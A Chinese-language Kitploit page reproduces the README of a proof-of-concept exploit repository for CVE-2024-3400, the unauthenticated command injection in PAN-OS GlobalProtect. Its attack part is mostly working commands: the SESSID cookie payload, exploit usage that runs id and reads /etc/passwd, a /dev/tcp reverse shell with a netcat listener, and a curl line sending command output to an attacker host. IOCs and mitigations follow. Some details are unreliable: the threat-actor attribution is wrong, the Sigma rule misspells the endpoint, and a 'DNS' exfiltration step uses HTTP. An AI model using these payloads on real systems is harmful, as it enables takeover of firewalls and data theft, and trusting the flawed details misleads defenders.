Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-3400-panos_rce_reproduction — cve-2024-3400-panos_rce_reproduction的复现 | Kitploit
工具/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育红队实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction的复现

查看仓库
31个月前尚未审核
分享

CVE-2024-3400:Palo Alto PAN-OS GlobalProtect 命令注入远程代码执行

CVSS 10.0 严重 | CWE-78:OS 命令注入 | 已在野外大规模利用


概述

CVE-2024-3400 是 Palo Alto Networks PAN-OS GlobalProtect 门户和网关接口中的一个预认证命令注入漏洞。该漏洞允许未经认证的攻击者在受影响的防火墙上以 root 权限执行任意命令。

  • 发现者: Volexity(2024 年 4 月)
  • 归属威胁行为者: UNC4554 / Midnight Blizzard(俄罗斯国家资助)
  • CVE ID: CVE-2024-3400
  • CVSS 评分: 10.0(严重)
  • CWE: CWE-78(OS 命令中特殊元素未正确中和)
  • 影响: PAN-OS 防火墙设备完全沦陷、横向移动、勒索软件部署
  • 状态: 在公开披露之前作为 0-day 被积极利用

技术细节

根本原因

该漏洞存在于 GlobalProtect 门户和网关组件的会话 cookie 处理中。负责处理 SESSID cookie 的函数在将用户提供的输入传递给 shell 命令之前,未能正确过滤该输入。

具体来说,向 GlobalProtect 门户端点 (/global-protect/login.esp) 发送一个未认证的 HTTP 请求,其中包含精心构造的、嵌入了 shell 元字符(反引号和变量扩展)的 SESSID cookie,会导致命令注入。

注入机制

漏洞代码路径的工作方式如下:

  1. GlobalProtect 门户收到对 /global-protect/login.esp 的请求
  2. 提取 SESSID cookie 值而未进行过滤
  3. 该值被插入到 shell 命令字符串中
  4. 通过 system() 或类似的 OS 命令执行函数执行该命令
  5. 由于应用程序以 root 身份运行,注入的命令以完整系统权限执行

Payload 构造

注入 payload 在 SESSID cookie 中使用反引号分隔的命令:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

路径遍历 (/../../../) 跳出预期目录,反引号引用的 COMMAND 部分导致 shell 执行攻击者的输入。可以使用输出重定向或反弹 shell 机制来提取命令结果。


受影响版本

PAN-OS 版本受影响版本修复版本
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h1011.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3

注意: PAN-OS 9.x 及更早版本不受影响。Cloud NGFW 和 Prisma Access 不受影响。


漏洞利用

攻击向量

  • 网络: 远程
  • 认证: 无需
  • 所需权限: 无
  • 用户交互: 无
  • 影响: 机密性、完整性和可用性完全丧失

已观察到的威胁行为者活动

UNC4554 / Midnight Blizzard(APT29)自 2024 年 3 月起被观察到在 0-day 阶段利用 CVE-2024-3400。Volexity 于 2024 年 4 月 12 日发布了分析报告。攻击模式包括:

  1. 初始访问: 大规模扫描暴露的 GlobalProtect 门户
  2. 命令执行: 通过 cookie 注入向量部署自定义 Python 后门
  3. 持久化: 安装 UPSTYLE 后门、窃取凭据、提取配置
  4. 横向移动: 将被攻破的防火墙作为跳板进入内部网络
  5. 数据窃取: 窃取配置文件、VPN 凭据和会话令牌
  6. 勒索软件: 初始入侵后发生的多起勒索软件部署事件

概念验证可用性

已发布多个公开的 PoC。本仓库为授权测试提供了一个功能性的漏洞利用程序。


复现步骤

要求

  • Python 3.8+
  • requests 库
  • 目标:存在漏洞的 Palo Alto PAN-OS 的 GlobalProtect 门户已暴露
  • 仅限授权访问

设置

root@kitploit:~
pip install requests

基本利用

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

反弹 Shell 示例

root@kitploit:~
# 在攻击者机器上启动监听器
nc -lvnp 4444

# 执行反弹 shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

任意文件读取

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

概念验证(curl)

root@kitploit:~
# 基本命令执行测试
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# 通过 DNS 外带捕获命令输出
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

PoC 脚本

请参见本仓库中的 exploit.py,这是一个功能完善的 Python 漏洞利用程序,支持:

  • 任意命令执行
  • 可选代理支持(Burp Suite / mitmproxy)
  • SSL 验证控制
  • 超时和重试处理
  • 响应分析

检测

IOC

  • 对 /global-protect/login.esp 的请求带有异常长或可疑的 SESSID cookie
  • 包含路径遍历序列(/../../)和反引号字符的 cookie
  • GlobalProtect 组件产生的意外进程
  • 防火墙向未知 IP 地址的非常规端口的出站连接
  • 写入 /opt/panlogs/tmp/device_telemetry/ 且扩展名为 .py 的文件

Sigma 规则(简化版)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

缓解措施

立即行动

  1. 更新 PAN-OS 到上述修复版本
  2. 如果无法立即修补,请应用以下一项替代措施:
    • 禁用设备遥测: set deviceconfig system telemetry disable yes(阻断漏洞代码路径,无需重启)
    • GlobalProtect 门户/网关访问控制: 将访问限制为受信任的源 IP
  3. 扫描入侵迹象: 检查 /opt/panlogs/tmp/device_telemetry/ 目录中是否存在未授权文件
  4. 审查日志: 审计 GlobalProtect 登录日志,查找异常的 SESSID cookie 值

永久修复

应用 Palo Alto Networks 提供的最新热修复。该修复在构造 shell 命令前正确过滤了 cookie 输入。

入侵评估

如果怀疑已被利用:

  1. 收集受影响防火墙的取证镜像
  2. 审计所有配置更改(最近修改时间戳)
  3. 审查正在运行的进程和 cron 作业
  4. 检查未授权的 SSH 密钥和用户账户
  5. 轮换所有 VPN 凭据和共享密钥
  6. 检查 C2 通信模式的网络流量

参考

来源链接
Palo Alto 安全公告https://security.paloaltonetworks.com/CVE-2024-3400
Volexity 分析https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
NVD 条目https://nvd.nist.gov/vuln/detail/CVE-2024-3400
CWE-78 详情https://cwe.mitre.org/data/definitions/78.html
CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
ATT&CK 技术https://attack.mitre.org/techniques/T1190/

免责声明

本仓库仅供授权安全测试和教育目的使用。未经授权利用此漏洞是违法的。作者不对滥用此信息负责。在测试任何系统之前,请确保您拥有明确的书面许可。


许可证

MIT 许可证 - 本内容供防御性安全研究和授权测试使用。

下载工具